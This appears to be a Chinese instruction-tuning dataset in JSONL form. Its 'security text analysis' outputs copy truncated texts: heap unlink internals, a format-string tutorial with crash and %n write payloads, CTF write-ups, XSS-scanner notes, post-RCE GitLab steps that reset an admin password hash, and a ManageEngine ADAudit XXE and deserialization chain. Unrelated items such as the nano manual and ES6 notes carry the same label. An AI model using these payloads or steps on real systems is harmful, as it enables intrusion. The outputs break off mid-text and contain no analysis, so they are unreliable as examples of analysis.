{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nusing System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Diagnostics; using System.Drawing; using System.Drawing.Imaging; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Threading.Tasks; using System.Windows.Forms; using ZXing; namespace QrSolver { enum EdgeType { Left = 0, Top = 1, Right = 2, Bottom = 3 } class EdgeTemplate { public EdgeType Type { get; private set; } public Point[] Points { get; private set; } public int Width { get; private set; } public int Height { get; private set; } public EdgeTemplate(EdgeType type, int width, int height) { Type = type; Width = width; Height = height; Points = GetPoints(type, width, height); } private Point[] GetPoints(EdgeType type, int width, int height) { switch (type) { case EdgeType.Left: return Sweep(0, 0, 0, 1, height); case EdgeType.Top: return Sweep(0, 0, 1, 0, width); case EdgeType.Right: return Sweep(width - 1, 0, 0, 1, height); case EdgeType.Bottom: return Sweep(0, height - 1, 1, 0, width); default: throw new InvalidOperationException(); } } private Point[] Sweep(int sx, int sy, int dx, int dy, int size) { return Enumerable.Range(0, size) .Select(i => new Point(sx + dx * i, sy + dy * i)) .ToArray(); } } class Edge { private Edge() { } public Bitmap Source { get; private set; } public Color[] Data { get; private set; } public EdgeType Type { get; private set; } public Edge(Bitmap bitmap, EdgeTemplate template) { Source = bitmap; Type = template.Type; Data = template.Points.Select(x => bitmap.GetPixel(x.X, x.Y)).ToArray(); } public static EdgeType Opposite(EdgeType type) { return (EdgeType)(((int)type + 2) % 4); } private static bool Matches(EdgeType fst, EdgeType snd) { return fst == Opposite(snd); } private static bool Matches(Color[] fst, Color[] snd) { return Enumerable.Zip(fst, snd, (a, b) => a.Equals(b)).All(x => x); } public static Point ToDirection(EdgeType type) { switch (type) { case EdgeTy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### unlink概述 unlink 用来将一个双向链表只存储空闲的 chunk中的一个元素取出来可能在以下地方使用 - malloc - 从恰好大小合适的 large bin 中获取 chunk - **这里需要注意的是 fastbin 与 small bin 就没有使用 unlink这就是为什么漏洞会经常出现在它们这里的原因** - 依次遍历处理 unsorted bin 时也没有使用 unlink  - 从比请求的 chunk 所在的 bin 大的 bin 中取 chunk - free - 后向合并合并物理相邻低地址空闲 chunk - 前向合并合并物理相邻高地址空闲 chunk除了 top chunk - malloc_consolidate - 后向合并合并物理相邻低地址空闲 chunk - 前向合并合并物理相邻高地址空闲 chunk除了 top chunk - realloc - 前向扩展合并物理相邻高地址空闲 chunk除了top chunk 由于 unlink 使用非常频繁所以 unlink 被实现为了一个宏如下 ```c /* Take a chunk off a bin list */ // unlink p #define unlink(AV, P, BK, FD) { \\ // 由于 P 已经在双向链表中所以有两个地方记录其大小所以检查一下其大小是否一致 if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \\ malloc_printerr (\"corrupted size vs. prev_size\"); \\ FD = P->fd; \\ BK = P->bk; \\ // 防止攻击者简单篡改空闲的 chunk 的 fd 与 bk 来实现任意写的效果 if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \\ malloc_printerr (check_action, \"corrupted double-linked list\", P, AV); \\ else { \\ FD->bk = BK; \\ BK->fd = FD; \\ // 下面主要考虑 P 对应的 nextsize 双向链表的修改 if (!in_smallbin_range (chunksize_nomask (P)) \\ // 如果P->fd_nextsize为 NULL表明 P 未插入到 nextsize 链表中 // 那么其实也就没有必要对 nextsize 字段进行修改了 // 这里没有去判断 bk_nextsize 字段可能会出问题 && __builtin_expect (P->fd_nextsize != NULL, 0)) { \\ // 类似于小的 chunk 的检查思路 if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \\ || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \\ malloc_printerr (check_action, \\ \"corrupted double-linked list (not small)\", \\ P, AV); \\ // 这里说明 P 已经在 nextsize 链表中了 // 如果 FD 没有在 nextsize 链表中 if (FD->fd_nextsize == NULL) { \\ // 如果 nextsize 串起来的双链表只有 P 本身那就直接拿走 P // 令 FD 为 nextsize 串起来的 if (P->fd_nextsize == P) \\ FD->fd_nextsize = FD->bk_nextsize = FD; \\ else { \\ // 否则我们需要将 FD 插入到 nextsize 形成的双链表中 FD->fd_nextsize = P->fd_nextsize; \\ FD->bk_nextsize = P->bk_nextsize; \\ P->fd_nextsize->bk_nextsize = FD; \\ P->bk_nextsize->fd_nextsize = FD; \\ } \\ } else { \\ // 如果在的话直接拿走即可 P->fd_nextsize->bk_nextsize = P->bk_nextsize; \\ P->bk_nextsize->fd_nextsize = P->fd_nextsize; \\ } \\ } \\ } \\ } ``` 这里我们以 smal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 格式化字符串漏洞利用方式 其实在上一部分我们展示了格式化字符串漏洞的两个利用手段 - 使程序崩溃因为%s对应的参数地址不合法的概率比较大 - 查看进程内容根据%d%f输出了栈上的内容 ### 格式化字符串漏洞关于程序崩溃 通常来说利用格式化字符串漏洞使得程序崩溃是最为简单的利用方式因为我们只需要输入若干个%s即可 ```text %s%s%s%s%s%s%s%s%s%s%s%s%s%s ``` 这是因为栈上不可能每个值都对应了合法的地址所以总是会有某个地址可以使得程序崩溃这一利用虽然攻击者本身似乎并不能控制程序但是这样却可以造成程序不可用比如说如果远程服务有一个格式化字符串漏洞那么我们就可以攻击其可用性使服务崩溃进而使得用户不能够访问 ### 格式化字符串漏洞关于泄露内存 利用格式化字符串漏洞我们还可以获取我们所想要输出的内容一般会有如下几种操作 - 泄露栈内存 - 获取某个变量的值 - 获取某个变量对应地址的内存 - 泄露任意地址内存 - 利用GOT表得到libc函数地址进而获取libc进而获取其它libc函数地址 - 盲打dump整个程序获取有用信息 ### 格式化字符串漏洞关于覆盖内存 这里我们可以想一下格式化字符串中的类型 ``` %n,不输出字符但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量 ``` 通过这个类型参数再加上一些小技巧我们就可以达到我们的目的这里仍然分为两部分一部分为覆盖栈上的变量第二部分为覆盖指定地址的变量 这里我们给出如下的程序来介绍相应的部分 ``` c /* example/overflow/overflow.c */ #include <stdio.h> int a = 123, b = 456; int main() { int c = 789; char s[100]; printf(\"%p\\n\", &c); scanf(\"%s\", s); printf(s); if (c == 16) { puts(\"modified c.\"); } else if (a == 2) { puts(\"modified a for a small number.\"); } else if (b == 0x12345678) { puts(\"modified b for a big number!\"); } return 0; } ``` makefile在对应的文件夹中而无论是覆盖哪个地址的变量我们基本上都是构造类似如下的payload ```text ...[overwrite addr]....%[overwrite offset]$n ``` 其中...表示我们的填充内容overwrite addr 表示我们所要覆盖的地址overwrite offset地址表示我们所要覆盖的地址存储的位置为输出函数的格式化字符串的第几个参数所以一般来说也是如下步骤 - 确定覆盖地址 - 确定相对偏移 - 进行覆盖 ### 覆盖栈内存方法 #### 确定覆盖地址 首先我们自然是来想办法知道栈变量c的地址由于目前几乎上所有的程序都开启了aslr保护所以栈的地址一直在变所以我们这里故意输出了c变量的地址 #### 确定相对偏移 其次我们来确定一下存储格式化字符串的地址是printf将要输出的第几个参数() 这里我们通过之前的泄露栈变量数值的方法来进行操作通过调试 ```shell  0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>  0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp] 0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret 0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp] 0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret [ stack ] ['0xffffcd0c', 'l8'] 8 0xffffcd0c+0x00: 0x080484d7  <main+76> add esp, 0x10  $esp 0xffffcd10+0x04: 0xffffcd28  \"%d%d\" 0xffffcd14+0x08: 0xffffcd8c  0x00000315 0xffffcd18+0x0c: 0x000000c2 0xffffcd1c+0x10: 0xf7e8b6bb  <handle_intel+107> add esp, 0x10 0xffffcd20+0x14: 0xffffcd4e  0xffff0000  0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Challenge #1 Solved together with YaakovCohen88 ## Description > Welcome Agent. > > A team of field operatives is currently on-site in enemy territory, working to retrieve intel on an imminent terrorist attack. > > The intel is contained in a safe, the plans for which are available to authorized > clients via an app. > > Our client ID is f6e772ba649047c8b5d653914bd5d6d7 > > Your mission is to retrieve those plans, and allow our team to break into the safe. > > Good luck!, > M.| An APK file was attached. ## Solution We start by extracting the APK file using `apktool`: ```console root@kali:/media/sf_CTFs/mossad/1# apktool d app.apk I: Using Apktool 2.3.4-dirty on app.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... ``` The first thing to look at is the manifest: ```xml <?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\"?><manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.iwalk.locksmither\" platformBuildVersionCode=\"1\" platformBuildVersionName=\"1.0.0\"> <uses-permission android:name=\"android.permission.INTERNET\"/> <application android:data=\"look for us on github.com\" android:debuggable=\"true\" android:icon=\"@mipmap/ic_launcher\" android:label=\"LockSmither\" android:name=\"io.flutter.app.FlutterApplication\"> <activity android:configChanges=\"density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize\" android:hardwareAccelerated=\"true\" android:launchMode=\"singleTop\" android:name=\"com.iwalk.locksmither.MainActivity\" android:theme=\"@style/LaunchTheme\" android:windowSoftInputMode=\"adjustResize\"> <meta-data android:name=\"io.flutter.app.android.SplashScreenUntilFirstFrame\" android:value=\"tru", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对些基于chrome的dom-xss插件学习,有 dom-based-xss-finder 和 XssSniper 看看它们的原理是什么 mainfest.json 对于chrome来说mainfest.json包含了整个插件各种配置在配置件中可以找到插件些启动的源代码 个较重要的个字段 browser_action 这个字段主要负责扩展图标点击后的弹出内容般为popup.html content_scripts matches 代表scripts插的时机默认为document_idle代表空闲时 js 代表插的scripts件路径 run_at 定义了哪些需要插scripts permissions 这个字段定义了插件的权限其中包括从浏览器tab历史纪录cookie数据等多个维度的权限 定义 content_security_policy 这个字段定义了插件的CSP 但这个字段不影响content_scripts的脚本 background 这个字段定义插件的后台这个在默认设置下是在后台持续运的只随浏览器的开启和关闭 persistent 定义了后台对应的路径 page 定义了后台的html scripts 当值为false时background的不会在后台直运 XssSnpier 来360 0kee的插件下载地址https://0kee.360.cn/domXss/ 出来好早了我试了下似乎插件有错误还运不了就直接看相关代码吧 mainfest.json { \"manifest_version\":2, \"name\": \"XssSniper\", \"version\": \"1.1.33\", \"description\": \"Find XSS and SOME\", \"content_scripts\": [ { \"all_frames\": true, \"matches\": [ \"http://*/*\", \"https://*/*\", \"file://*/*\" ], \"js\": [\"js/insert.js\"], \"run_at\": \"document_start\" } ], \"background\": { \"scripts\": [ \"js/background.js\" ], \"persistent\":true }, \"permissions\": [ \"webRequest\", \"webRequestBlocking\", \"*://*/\", \"tabs\", \"notifications\" ], \"browser_action\": { \"default_icon\": { \"19\": \"img/init_19.png\", \"38\": \"img/init_38.png\" }, \"default_popup\": \"popup.html\", \"default_title\": \"Open the pannel.\" }, \"icons\": { \"128\": \"img/logo_128.png\", \"16\": \"img/error_16.png\", \"48\": \"img/logo_48.png\" }, \"incognito\": \"spanning\", \"content_security_policy\": \"script-src 'self' 'unsafe-eval'; object-src 'self'\" } 后台执 background.js 去掉http返回头中的 x-frame-options  X-XSS-Protection 对于jsonp的内容会动检测xss将参数 = 替换为payload 注js insert.js 先看下jsonp的检测 jsonp = jsonp.replace(/\\=/ig,\"=<img>tsst\"); httpRequest(jsonp,function(s){ if (s.indexOf(\"<img>tsst\") > -1) { notify(\"Jsonp可能存在XSS\",jsonp); sendResponse(\"xss:\"+jsonp); } }) MutationObserver 是什么api查了下是个监视函数当dom有变动时候会触发回调函数 https://developer.mozilla.org/zh-CN/docs/Web/API/MutationObserver/MutationObserver 它会监视所有新创建的script标签判断src的内容是否含有 ? 在做进步判断进步判断是什么呢就是正则匹 配内容是否像jsonp提出报警然后就是替换参数内容看是否存在xss 监听事件错误 有的xss能够使但是需要些特殊构造般的payload打可能只会报错这时候可以在整个加载前提 前注好监视错误的jsxss", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n通过gitlab RCE后可以拿数据库密码录般在gitlab config/database.yml件中 先获取root的密弄完还原回去 cat config/database.yml # # PRODUCTION # production: adapter: postgresql encoding: unicode database: gitlabhq_production host: postgresql port: 5432 username: gitlab password: \"password\" pool: 10 prepared_statements: true select * from users where id =1; $2a$10$G7Iib3hrjEJmmpNkwvR16Oxjk0QslIPZ28NoKd41i/aWfonXlwwui 12345678的密值为$2a$10$9sM0WeC3WSDCx9HWwr7z7eV3h3Q/tPxP7G2kvCWxWqdJemid1lICa 修改密码为12345678 update users set encrypted_password='$2a$10$9sM0WeC3WSDCx9HWwr7z7eV3h3Q/tPxP7G2kvCWxWqdJemid1lICa' where e id =1; gitlab ce没办法搜索关键字需要写爬可以参考以前应急时候写的辣鸡代码 https://github.com/LoveCppp/gitlabSearch", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 A REALLY, REALLY BRIEF HISTORY OF DCG REALLY  WERE GETTING TO THE PANEL 2 3 GROUP UP 4 5 FINDING OTHER HACKERS WAS HARD 2 0 7 6 5 0 3 7 2 0 6 8 ?? 9 91 active Defcon Groups worldwide ..and growing again! 10 d C g 11 12 dcgroups{at}defcon(døt)org 13 d C g 14 DCG Panel  Anch (DC503)  BlakDayz (DC225)  Anarchy Angel & Ngharo (DC414)  Itzik Kotler & IFach Ian Amit (DC9723)  GenericSuperHero & Londo (Black Lodge Research)  Roamer (Unallocated)  Converge (DCG Keymaster) 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 Index / Outline  (1) Defcon Groups Logo  (2) A Really, Really Brief History of the DCG  (3) late 2002 ideas led to creaWon of Defcon Groups  (4) was one of a dozen or so folks starWng a group  group would be great and far exceed the awesomeness of our local 2600 (or so I thought)  (5) officially launched in 2003 at Defcon 11  (6) reality of local 207  (7) trekked to Oregon and parWcipated in 503 scene  highs, lows, but everyone got busy 34  (8) moved to Sea[le and found the thriving 206  more hackers!  (9) And the Years Passed  most acWve groups off doing their own thing  many groups looking to abandon the Defcon banner in favor of hackerspaces  they have much cooler names  many groups simply didn't exist or respond  began with a list of over 170+ groups internaWonally  102 were inacWve! (seriously, I have the list to prove it)  30 had significantly changed; hey, Id not been the POC for DC207 for over 6 years! 35  (10) DCG Lives!  91 acWve groups worldwide today  at least 4 or 5 in the DCG inbox starWng up  (11) What is Coming?  Social media: facebook, google+, twi[er.  AnWsocial media: mailing lists, forums,  DCG- specific site launch later this year!  Hacker media: irc, bbs, group-built infrastructure?  (12) Enough tangent, the groups that have been there, done that, do that  the PANEL! 36", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnano === 字符终端文本编辑器 ## 补充说明 **nano** 是一个字符终端的文本编辑器有点像DOS下的editor程序它比vi/vim要简单得多比较适合Linux初学者使用某些Linux发行版的默认编辑器就是nano nano命令可以打开指定文件进行编辑默认情况下它会自动断行即在一行中输入过长的内容时自动拆分成几行但用这种方式来处理某些文件可能会带来问题比如Linux系统的配置文件自动断行就会使本来只能写在一行上的内容折断成多行了有可能造成系统不灵了因此如果你想避免这种情况出现就加上`-w`选项吧 ### 语法 ```shell nano [选项] [[+行,列] 文件名]... ``` ### 选项 ```shell -h, -? --help 显示此信息 +行,列 从所指列数与行数开始 -A --smarthome 启用智能 HOME 键 -B --backup 储存既有文件的备份 -C <目录> --backupdir=<目录> 用以储存独一备份文件的目录 -D --boldtext 用粗体替代颜色反转 -E --tabstospaces 将已输入的制表符转换为空白 -F --multibuffer 启用多重文件缓冲区功能 -H --historylog 记录与读取搜索/替换的历史字符串 -I --ignorercfiles 不要参考nanorc 文件 -K --rebindkeypad 修正数字键区按键混淆问题 -L --nonewlines 不要将换行加到文件末端 -N --noconvert 不要从 DOS/Mac 格式转换 -O --morespace 编辑时多使用一行 -Q <字符串> --quotestr=<字符串> 引用代表字符串 -R --restricted 限制模式 -S --smooth 按行滚动而不是半屏 -T <#列数> --tabsize=<#列数> 设定制表符宽度为 #列数 -U --quickblank 状态行快速闪动 -V --version 显示版本资讯并离开 -W --wordbounds 更正确地侦测单字边界 -Y <字符串> --syntax=<字符串> 用于加亮的语法定义 -c --const 持续显示游标位置 -d --rebinddelete 修正退格键/删除键混淆问题 -i --autoindent 自动缩进新行 -k --cut 从游标剪切至行尾 -l --nofollow 不要依照符号连结而是覆盖 -m --mouse 启用鼠标功能 -o <目录> --operatingdir=<目录> 设定操作目录 -p --preserve 保留XON (Q) 和XOFF (S) 按键 -q --quiet 沉默忽略启动问题, 比如rc 文件错误 -r <#列数> --fill=<#列数> 设定折行宽度为 #列数 -s <程序> --speller=<程序> 启用替代的拼写检查程序 -t --tempfile 离开时自动储存不要提示 -u --undo 允许通用撤销[试验性特性] -v --view 查看(只读)模式 -w --nowrap 不要自动换行 -x --nohelp 不要显示辅助区 -z --suspend 启用暂停功能 -$ --softwrap 启用软换行 -a, -b, -e, -f, -g, -j (忽略为与pico 相容) ``` ### 用法 **光标控制** * 移动光标使用用方向键移动 * 选择文字按住鼠标左键拖到 **复制剪贴和粘贴** * 复制一整行Alt+6 * 剪贴一整行Ctrl+K **粘贴Ctrl+U** 如果需要复制剪贴多行或者一行中的一部分先将光标移动到需要复制剪贴的文本的开头按Ctrl+6或者Alt+A做标记然后移动光标到 待复制剪贴的文本末尾这时选定的文本会反白用Alt+6来复制Ctrl+K来剪贴若在选择文本过程中要取消只需要再按一次Ctrl+6 **搜索** 按Ctrl+W然后输入你要搜索的关键字回车确定这将会定位到第一个匹配的文本接着可以用Alt+W来定位到下一个匹配的文本 **翻页** * `Ctrl+Y` 到上一页 * `Ctrl+V` 到下一页 **保存** 使用Ctrl+O来保存所做的修改 **退出** 按Ctrl+X 如果你修改了文件下面会询问你是否需要保存修改输入Y确认保存输入N不保存按Ctrl+C取消返回如果输入了Y下一步会让你输入想要保存的文件名如果不需要修改文件名直接回车就行若想要保存成别的名字也就是另存为则输入新名称然后确 定这个时候也可用Ctrl+C来取消返回", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeat the Casinos At Their Own Game DEFCON XI Presented By : Paranoid Android Paranoid-Android@hushmail.com Introduction  Who Am I?  Atlantic City Experience  Las Vegas Experience  Disclaimer  You are not a ready!  Am I teaching you anything illegal?  Why Do This?  Money?  Excitement?  New Job? Casino Games  Games You Can Beat  Blackjack  Sports/Horses  Poker  Games You Can NOT Beat  Slots  Craps  Roulette Blackjack  Why can Blackjack Be Beat?  Law of Independent Trials  What is Basic Strategy?  What is Card Counting?  Is Card Counting Legal? Blackjack  Card Counting System  Hi/Lo  Other systems  Practice, practice, practice!  Casino Heat  Get to know your staff  Casino Cover  Whats the worst that can happen? Sports Betting/Horses  Can Sports Betting Be Beat?  Zero Ante Game  Specialization  Shopping Around  Propositions  Tour De France  The Sky Is The Limit! Poker  Its not what you think . . .  Which game should I learn?  Ring Games  Tournaments  Read, Read, Read!  No lack of information on poker  Opponents Are Everything! Other Plays  Hunting For Dealers  3 Card Poker  Casino Promotions  New Games  Coupons  Other Games  California Pai Gow Comps  Can Make Losing Worthwhile  It Pays To Shop Around  Required Levels  Food  Rooms  Tickets & Higher  Must Read Comp City Additional Resources  http://www.bj21.com  Burning The Tables In Las Vegas  Ian Andersen  Sharp Sports Betting  Stanford Wong  Comp City  Max Rubin  Paranoid-Android@hushmail.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# A Genuine Counterfeit * Category: Hardware * 350 Points * Solved by the JCTF Team ## Description > Our product is being counterfeited by someone on the black market. > > It is your goal to find out how they are doing it. > > The analysis done by our hardware engineers shows that they swapped out the [24LC256 EEPROM](https://en.wikipedia.org/wiki/EEPROM) chip for a custom chip but the engineers still don't understand how the attack works. > When using the fake chip with our software, the software says the product is genuine but it is clearly not. > > We have provided you a simulation of the product [at this link](https://wokwi.com/projects/350905024260343380) with a programmable replacement for the 24LC256 EEPROM. You can edit the code for the EEPROM (`eeprom-24lc256.chip.c`) in order to investigate and attack the product software. > The code in `sketch.ino` is similar to the actual product code but changing it will not change the simulation. > > Find how the counterfeiters are tricking our software and implement a POC showing us how it is done. > The flag will reveal itself when you are successful. `sketch.ino`: ```c // SPDX-License-Identifier: MIT // Copyright (C) 2022 Benjamin Meisels // !!!!!!!!!!!!!!!!! // This isn't the code running so don't try and change it // !!!!!!!!!!!!!!!!! #include \"mbedtls/md.h\" #include <cstring> #include <stdio.h> #include <Wire.h> #include <U8g2lib.h> #define EEPROM_I2C_ADDRESS 0x50 #define SHA256_DIGEST_SIZE 32 static const char G_AUTHENTICATION_MARKER[] = \"INTENT\"; static const size_t G_AUTHENTICATION_MARKER_SIZE = 7; static const byte G_EXPECTED_HASH_RESULT[SHA256_DIGEST_SIZE] = { // \"INTENT\" 0xc6, 0xa5, 0x99, 0x4d, 0xde, 0xd4, 0xe6, 0xa7, 0x7c, 0x8a, 0x95, 0x91, 0x62, 0x1a, 0xa1, 0xbd, 0x92, 0x17, 0xa4, 0x3b, 0x02, 0x9d, 0xbd, 0x7f, 0xaf, 0x8b, 0x2a, 0x16, 0xe9, 0xb6, 0x81, 0xc1 }; U8X8_SSD1306_128X64_NONAME_HW_I2C display(U8X8_PIN_NONE); bool is_device_available(uint8_t address) { Wire.beginTransmission(address); uint8_t error", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction to Hardware Hacking Scott Fullam Why Hardware Hacking?  Hardware Hacking does not seem to get near the publicity as computer hacking  Id like to change reputation of hacking, hardware in particular Hardware Hack: A Definition  A (sometimes) clever modification or fix made to a piece of equipment that improves its performance or makes the equipment do something for which it was not originally designed.  The results of the hack need not be useful in the strict sense of the word.  The word hack can be used as a noun or a verb.  Noun: That hack you made to your toaster was great!  Verb Lets hack your brothers TV set tonight to only tune in channel 13! Why is Hardware Hacking Easier than Software Hacking?  When you buy a piece of hardware, lets say a toaster for example, you can open it up and see what is inside and see how it works.  Repair manuals available for many pieces of equipment  Your GF/SO can benefit from your hardware skills!  You can fix stuff in the house  When was the last time your GF/SO asked you to fix their copy of MS Word?  When you buy a piece of commercial software, you cannot open it up to see how it works.  You are stuck with the executable file only and no source code that shows the inner workings  Its behavior is fixed to that which the original programmer intended.  You cannot examine it and change how it works.  Open Source software is the exception to this About Me  Graduated in 1990 with MS and BS in EECS from MIT  Have been hacking since I was a kid  Have held many interesting jobs:  Toy Designer  Digital Camera Architect  Startup Founder (PocketScience Inc)  Writer (My book) My Book  Hardware Hacking Projects for Geeks  Published by OReilly  Started the book 2 years ago  Gathered together a number of hacks I put together along with a few cool ones that I found Talk Overview  EE Basics  Basic Electronic Components and what they do  Cracking the case  How to open up electronics enclosures without destroying it  Building Circuits", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSatellite TV Technology How it works and what you can do with different dishes OldSkoolS How does content get from the broadcast location to my home? Telstar 6 This section will describe, in detail, how content from CNN Headline News broadcast center gets to your home. This information is characteristic of how most channels are transmitted from the broadcast location, to the service provider, and then to the home user. Atlanta You CNN uplinks (sends) their signal to the Telstar 6 satellite located at 93.0 West on Transponder 22. The location of a satellite is given in degrees away from the Greenwich meridian. This feed has a Symbol Rate of 4 MegaSymbols per second. The Forward Error Correction is set to ¾. This particular channel feed uses the PowerVu  encryption system. Telstar 6 Atlanta Section 1: Satellite TV Terminology and Broadcast Diagram : Signal Information CNN uplinks (sends) their signal to the Telstar 6 satellite located at 93.0 West on Transponder 22. The location of a satellite is given in degrees away from the Greenwich meridian. This feed has a Symbol Rate of 4 MegaSymbols per second. The Forward Error Correction is set to ¾. This particular channel feed uses the PowerVu  encryption system. 93.0 West  This refers to the location from the Greenwich Meridian. There are only east and west coordinates for satellites (and no north/south coordinates) because all the major TV and Data satellites are at the equator in a geosynchronous orbit (they move around the earth at the same speed the earth moves, therefore appearing to be stationary). Telstar 6 Atlanta Section 1: Satellite TV Terminology and Broadcast Diagram : Clarke Belt Section 1: Satellite TV Terminology and Broadcast Diagram : Clarke Belt This video shows how a moving big dish system pans the arc of satellites located in the Clarke Belt. CNN uplinks (sends) their signal to the Telstar 6 satellite located at 93.0 West on Transponder 22 which operates at a frequency of 12079 MHz with a Horizontal Po", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 变量的解构赋值 --- ### 数组的解构赋值 ES6 允许按照一定模式从数组和对象中提取值对变量进行赋值这被称为解构Destructuring ``` let [a, b, c] = [1, 2, 3] ``` 上面代码表示可以从数组中提取值按照对应位置对变量赋值 **注意**let数组里的值可以是数字变量对象函数等但无法拿到空格占位 ```js let [a,b,c,d,,] = [1,\"aaa\",{name:'sayname'},function(){}]; console.log(a,b,c,d); ``` **Rest**参数 - rest参数只包括那些没有给出名称的参数arguments包含所有参数 - arguments对象不是真正的array而rest参数是Array的实例可以直接应用sort, map, forEach, pop等方法 - arguments对象拥有一些自己额外的功能 Rest参数接收函数的多余参数组成一个数组放在形参的最后形式如下 ``` function func(a, b, ...theArgs) { // ... } ``` 例剩余参数数组里值的和 ``` var sum = (a,...rest) => { let rests = 0 for(let i=0;i<rest.length;i++){ if( isNaN(Number(rest[i])) ){continue} rests += Number(rest[i]) ; } //continue继续 return rests } console.log(`输出${rests}`) ``` 数组的扩展用 **...** 展开 例子连接两个数组 ``` let arr1 = [1,2,3,4] let arr2 = [5,6,7,8] //ES5写法var arr = arr1.concat(arr2,[9]) var arr = [...arr1,...arr2,9] console.log(arr) ``` **注意**ES6 内部使用严格相等运算符===判断一个位置是否有值所以如果一个数组成员不严格等于undefined默认值是不会生效的 ### 对象的解构赋值 对象的解构与数组有一个重要的不同数组的元素是按次序排列的变量的取值由它的位置决定而对象的属性没有次序变量必须与属性同名才能取到正确的值如果变量名与属性名不一致必须写成下面这样 ``` var { foo: baz } = { foo: 'aaa', bar: 'bbb' }; baz // \"aaa\" let obj = { first: 'hello', last: 'world' }; let { first: f, last: l } = obj; f // 'hello' l // 'world' ``` 例子利用对象解构赋值变量取属性同名的值 ``` //父组件 <Modal title='标题' cancelText='取消' okText='确定' show={this.state.show} onShow={this.handleClick} > <p>Some contents...</p> <p>Some contents...</p> <p>Some contents...</p> <p>Some contents...</p> </Modal> 子组件想拿到父组件里的同名属性 let {title,children,cancelText,okText} = this.props //等同于声明一个变量等于this.props下的同名属性 //let title = this.props.title等等 //下面使用时不用再写this.props.title可以代替直接用title代替 ``` ``` let hello = ({name,age}) => ( console.log(`my name:${name},age:${age}`) ) hello({name:'Liu',age:'24'}) ``` 对象的解构赋值是下面形式的简写 ``` let { foo: foo, bar: bar } = { foo: \"aaa\", bar: \"bbb\" }; //简写形式let{foo,bar}={foo: \"aaa\", bar: \"bbb\"} ``` 将obj中的对象foo赋值给一个变量 ``` let obj = {bar:'bbb',foo:'aaa',name:'sayname'}; let {foo} = obj; console.log(foo); var foo = obj.foo; ``` ### 字符", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n环境搭建 https://archives2.manageengine.com/active-directory-audit/7055/ManageEngine_ADAudit_Plus_x 64.exe 需要搭建一个域环境直接把安装adaudit的机器提升为域控就行 分析 这个洞用了两个点串起来成了一个rce分别是xxe和一个readObject的点 Cewolf readObject readObject是steventseeley挖掘的Cewolf反序列化ADAudit仍然有这个servlet并且init参数为 FileStorage de.laures.cewolf.storage.FileStorage#getChartImage 这个地方存在readObject 详细的不讲了看steventseeley在 https://srcincite.io/advisories/src-2020-0011/ 中提到的poc就懂 了 这个利用点需要在目标机器上上传一个序列化的payload然后通过 ../ 跨目录触发在下面的xxe中会 串起来利用 xxe xxe来自比较常规的DocumentBuilderFactory类 在com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#parseTaskContent 中 来自于eventTbl参数的 Task Content 或者 Task New Content 键值会造成xxe 然后找路由触发点 先来看web.xml /api/agent 对应 com.adventnet.sym.adsm.auditing.webclient.ember.api.ADAPAgentAPIServlet#processRequ est 跟如 com.adventnet.sym.adsm.auditing.webclient.ember.api.RestAPIHandler#executeAgentRequ est 通过正则匹配拿到对应的handler为 com.adventnet.sym.adsm.auditing.webclient.ember.api.agent.AgentDataHandler#receiveD ata 在receiveData中通过读body取jsonbody取不到就从header中拿json然后转成一个json数组 jsonEventArray接着如果是有效的json 交由 com.adventnet.sym.adsm.auditing.server.EventDataAdapter#notify 消息队列处理 notify只负责向eventQueue中加事件真正处理队列消息的地方在其子类 com.adventnet.sym.adsm.auditing.server.EventDataAdapter.EventDispatcher#run 中 在这里需要关注一点如果原始data中DomainName等于null那么DomainDnsName也会等于null 